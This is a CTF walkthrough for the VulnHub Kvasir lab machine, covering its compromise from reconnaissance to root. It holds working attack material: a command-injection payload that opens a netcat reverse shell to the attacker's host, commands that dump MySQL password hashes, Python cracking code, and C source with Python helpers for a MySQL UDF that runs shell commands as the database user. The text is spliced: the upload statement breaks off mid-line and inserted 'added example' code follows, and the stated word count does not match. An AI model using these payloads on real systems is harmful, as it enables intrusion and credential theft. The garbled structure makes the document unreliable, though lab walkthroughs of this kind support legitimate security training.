Kvasir CTF Walkthrough
Word count: 707 | 2025-08-15 21:31:25

Kvasir CTF Walkthrough Tutorial

Target overview

Kvasir is a multi-layered CTF target machine spanning several network segments and several exploitation techniques. This tutorial walks through the full penetration process, from information gathering to obtaining root.

Environment setup

  1. Download the target: https://download.vulnhub.com/kvasir/kvasir1.tar
  2. Extract it and import it into your virtualisation environment
  3. Make sure the attacker machine (Kali Linux) and the target sit on the same network

Penetration testing workflow

1. Information gathering

1.1 Finding the target IP

Sweep the local network with nmap (-sn does host discovery only, no port scan):

nmap -sn 192.168.0.0/24

1.2 Port scanning

nmap -p- -A 192.168.0.104

Only port 80 is open (-p- covers all 65535 TCP ports, -A adds service detection and OS fingerprinting).

2. Web application penetration

2.1 Accessing the web service

Open http://192.168.0.104 in a browser

2.2 SQL injection testing

  1. The page has a search box; test it for SQL injection
  2. Run sqlmap against it:
sqlmap -u "http://192.168.0.104/search.php?query=test" --batch

The requests are answered with HTTP 403 Forbidden, so this path is abandoned.

2.3 Directory enumeration

Enumerate directories with dirb or gobuster:

gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/dirb/common.txt

This reveals login.php.

2.4 Bypassing the 302 redirect

Requesting login.php answers with a 302 redirect. Intercept the server's response in Burp Suite and change the status code from 302 to 200; the browser then renders the login page instead of following the redirect.

3. Exploiting command injection

3.1 Finding the command injection

The login form is vulnerable to command injection: its input reaches a shell command on the server.

3.2 Reverse shell

Start a netcat listener on the attacker machine (192.168.0.106, port 4444) and submit the payload below in the form. The ; separator ends whatever command the form builds and chains nc after it. Note that nc -e exists only in the traditional netcat build; if the target ships OpenBSD netcat, use a mkfifo-based or /dev/tcp reverse shell instead:

apache2; nc -e /bin/sh 192.168.0.106 4444

4. Database penetration

4.1 Inspecting the database configuration

From the shell, read the source of login.php; it holds the database connection details, including plaintext credentials:

mysql_connect("192.168.2.200", "webapp", "webapp")

4.2 Database operations

The database host 192.168.2.200 sits on a second network segment, so these commands are run through the reverse shell on the web server rather than directly from the attacker machine:

  1. List the account's grants:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'show grants;'
  2. List the tables:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; show tables;'
  3. Dump the account hashes (requires read access to the mysql system database):
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use mysql; select DISTINCT User,Password from user;'

4.3 Cracking the password

Save the root hash from the previous step to mysql_hash.txt and crack it with John the Ripper. A MySQL 4.1+ hash is a * followed by 40 hex characters; John normally detects it, otherwise add --format=mysql-sha1:

john --wordlist=/usr/share/wordlists/rockyou.txt mysql_hash.txt

Result: the root password is coolwater.
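To make visible what John is matching against, here is an added Python example (not part of the original walkthrough) that computes the MySQL 4.1+ hash format found in mysql.user, picks the matching John --format, and runs a small dictionary attack. The sample hash is the value the MySQL manual shows for PASSWORD('mypass'); the five-word wordlist is constructed and stands in for rockyou.txt.

```python
import hashlib
import re
from typing import Iterable, Optional

# MySQL 4.1+ stores '*' + uppercase hex of SHA1(SHA1(password)) in mysql.user.Password
# (John format "mysql-sha1"). The pre-4.1 scheme is 16 hex characters (John format "mysql").


def mysql41_hash(password: str) -> str:
    """Return the MySQL 4.1+ hash exactly as it appears in mysql.user.Password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()  # raw 20-byte digest, not hex
    outer = hashlib.sha1(inner).hexdigest().upper()
    return "*" + outer


def john_format(stored_hash: str) -> str:
    """Pick the John the Ripper --format for a hash dumped from mysql.user."""
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", stored_hash):
        return "mysql-sha1"
    if re.fullmatch(r"[0-9A-Fa-f]{16}", stored_hash):
        return "mysql"
    raise ValueError("not a MySQL password hash: %r" % stored_hash)


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on a 4.1+ hash: first matching candidate, or None."""
    if john_format(stored_hash) != "mysql-sha1":
        raise NotImplementedError("only the 4.1+ scheme is implemented here")
    target = stored_hash.upper()
    for candidate in wordlist:
        word = candidate.rstrip("\r\n")  # wordlist files carry line endings
        if mysql41_hash(word) == target:
            return word
    return None


# Constructed sample input: the hash the MySQL manual shows for PASSWORD('mypass'),
# and a five-word stand-in for rockyou.txt.
SAMPLE_HASH = "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"
SAMPLE_WORDLIST = ["123456\n", "password\n", "coolwater\n", "mypass\n", "letmein\n"]

if __name__ == "__main__":
    print(john_format(SAMPLE_HASH), crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The double SHA1 with no salt is why rockyou.txt finishes in seconds on such hashes: every candidate costs two hash operations and the same password always yields the same stored value.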

5. MySQL UDF privilege escalation

5.1 Compiling the malicious library

Create raptor.c, a minimal user-defined function that passes its argument to system(). The UDF structures are redeclared inline so the file compiles without the MySQL development headers:

/* Minimal UDF that hands its single string argument to system(). The MySQL UDF
   structures are redeclared here so the file compiles without mysql_com.h. */
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
    unsigned int arg_count;        /* number of arguments passed to the function */
    enum Item_result *arg_type;    /* type of each argument */
    char **args;                   /* argument values */
    unsigned long *lengths;        /* length of each argument */
    char *maybe_null;              /* set if the argument may be NULL */
} UDF_ARGS;
typedef struct st_udf_init {
    char maybe_null;
    unsigned int decimals;
    unsigned long max_length;
    char *ptr;
    char const_item;
} UDF_INIT;
/* Registered with CREATE FUNCTION do_cmd RETURNS INTEGER; an INTEGER UDF must
   return long long, which is what mysqld reads back from the call. */
long long do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error){
    if (args->arg_count != 1)
        return(0);
    system(args->args[0]);         /* runs with the privileges of the mysqld process */
    return(0);
}
/* init hook called once per statement; returning 0 accepts the call */
char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message){
    return(0);
}

Compile it into a shared object:

gcc -fPIC -g -c raptor.c
gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc

5.2 Uploading the malicious library

Encode the .so as a single line of hex (-c is set to the file size so xxd never wraps the output):

xxd -p -c `stat --format="%s" raptor.so` raptor.so

Then write it to the database server through MySQL:

SELECT x'
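As an added example (not the page's own code), the Python below builds the statements that the xxd step feeds into MySQL: a single-line hex literal written to disk with SELECT ... INTO DUMPFILE, the CREATE FUNCTION registration for do_cmd from raptor.c, and a test call. The plugin directory /usr/lib/mysql/plugin and the 4 MiB max_allowed_packet are assumptions to confirm on the target; the sample .so bytes are constructed (ELF magic plus padding) and not a loadable library.

```python
import os
from typing import List

# Assumed plugin directory; on the target confirm it first with
#   SHOW VARIABLES LIKE 'plugin_dir';
PLUGIN_DIR = "/usr/lib/mysql/plugin"

# The whole statement must fit in one packet; 4 MiB is the MySQL 5.x default for
# max_allowed_packet (check with SHOW VARIABLES LIKE 'max_allowed_packet').
DEFAULT_MAX_PACKET = 4 * 1024 * 1024


def is_elf(data: bytes) -> bool:
    """True if the bytes start with the ELF magic, i.e. look like a compiled .so."""
    return data[:4] == b"\x7fELF"


def hex_literal(data: bytes) -> str:
    """Single-line MySQL hex literal: the text xxd -p -c <filesize> prints, wrapped as x'...'."""
    return "x'" + data.hex().upper() + "'"


def dumpfile_statement(data: bytes, dest: str, max_packet: int = DEFAULT_MAX_PACKET) -> str:
    """SELECT <literal> INTO DUMPFILE writes the literal's raw bytes verbatim (no escaping,
    no trailing newline), which is why DUMPFILE rather than OUTFILE is used for a binary."""
    if not is_elf(data):
        raise ValueError("not an ELF shared object")
    stmt = "SELECT %s INTO DUMPFILE '%s';" % (hex_literal(data), dest)
    if len(stmt) > max_packet:
        raise ValueError("statement is %d bytes, over max_allowed_packet=%d" % (len(stmt), max_packet))
    return stmt


def udf_statements(so_bytes: bytes, soname: str = "raptor.so", func: str = "do_cmd",
                   plugin_dir: str = PLUGIN_DIR) -> List[str]:
    """Upload, register and invoke the do_cmd UDF from raptor.c; the command runs as mysqld's user."""
    dest = os.path.join(plugin_dir, soname)
    return [
        dumpfile_statement(so_bytes, dest),
        "CREATE FUNCTION %s RETURNS INTEGER SONAME '%s';" % (func, soname),
        "SELECT %s('id > /tmp/udf_out; chmod 644 /tmp/udf_out');" % func,
    ]


# Constructed stand-in for raptor.so: ELF magic plus zero padding, not a loadable library.
SAMPLE_SO = b"\x7fELF" + bytes(12)

if __name__ == "__main__":
    for stmt in udf_statements(SAMPLE_SO):
        print(stmt)
```

The DUMPFILE step needs the FILE privilege and a plugin directory the mysqld process can write to, which is why the root credentials recovered in 4.3 are used here rather than the webapp account.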